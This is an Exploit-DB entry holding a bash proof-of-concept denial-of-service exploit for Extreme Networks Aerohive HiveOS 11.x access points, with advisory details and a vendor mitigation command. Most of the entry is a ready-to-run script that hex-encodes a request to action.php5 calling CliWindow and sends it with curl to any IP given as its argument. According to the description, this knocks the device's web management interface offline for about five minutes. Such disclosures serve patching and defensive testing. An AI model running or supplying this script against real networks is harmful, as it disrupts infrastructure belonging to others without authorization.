Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)

EDB-ID:

48441

CVE:

N/A

EDB Verified:

Author:

LiquidWorm

Type:

dos

Exploit:   /  

Platform:

Hardware

Date:

2020-05-08

Vulnerable App: 
# Exploit title : Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)
# Exploit Author : LiquidWorm
# Date : 2020-05-06
# Vendor: Extreme Networks
# Product web page: https://www.extremenetworks.com
# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
# Affected version: <=11.x

#!/bin/bash
#
#
# Extreme Networks Aerohive HiveOS <=11.x Remote Denial of Service Exploit
#
#
# Vendor: Extreme Networks
# Product web page: https://www.extremenetworks.com
# Datasheet: https://www.aerohive.com/wp-content/uploads/Aerohive_Datasheet_HiveOS.pdf
# Affected version: <=11.x
#
# Summary: Aerohive HiveOS is the network operating system that powers
# all Aerohive access points, based on a feature-rich Cooperative Control
# architecture. HiveOS enables Aerohive devices to organize into groups,
# or 'hives', which allows functionality like fast roaming, user-based
# access control and fully stateful application-aware firewall policies,
# as well as additional security and RF networking features - all without
# the need for a centralized or dedicated controller.
#
# Desc: An unauthenticated malicious user can trigger a Denial of Service
# (DoS) attack when sending specific application layer packets towards the
# Aerohive NetConfig UI. This PoC exploit renders the application unusable
# for 305 seconds or 5 minutes with a single HTTP request using the action.php5
# script calling the CliWindow function thru the _page parameter, denying
# access to the web server hive user interface.
#
# Vendor mitigation:
# CLI> no system web-server hive-ui enable
#
# Tested on: Hiawatha v9.6
#
#
# Vulnerability discvered by Gjoko 'LiquidWorm' Krstic
#                            @zeroscience
#
#
# Advisory ID: ZSL-2020-5566
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5566.php
#
#
# 05.12.2019
#

if [ "$#" -ne 1 ]; then
	echo -ne "\nUsage: $0 [ipaddr]\n\n"
	exit
fi

IP=$1

SBYTES=`echo -e \
"\x61\x63\x74\x69\x6f\x6e\x2e"\
"\x70\x68\x70\x35\x3f\x5f\x70"\
"\x61\x67\x65\x3d\x43\x6c\x69"\
"\x57\x69\x6e\x64\x6f\x77\x26"\
"\x5f\x61\x63\x74\x69\x6f\x6e"\
"\x3d\x67\x65\x74\x26\x5f\x61"\
"\x63\x74\x69\x6f\x6e\x54\x79"\
"\x70\x65\x3d\x31"`##_000000251

curl -vk "https://$IP/$SBYTES" --user-agent "Profesorke/Dzvoneshe"
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services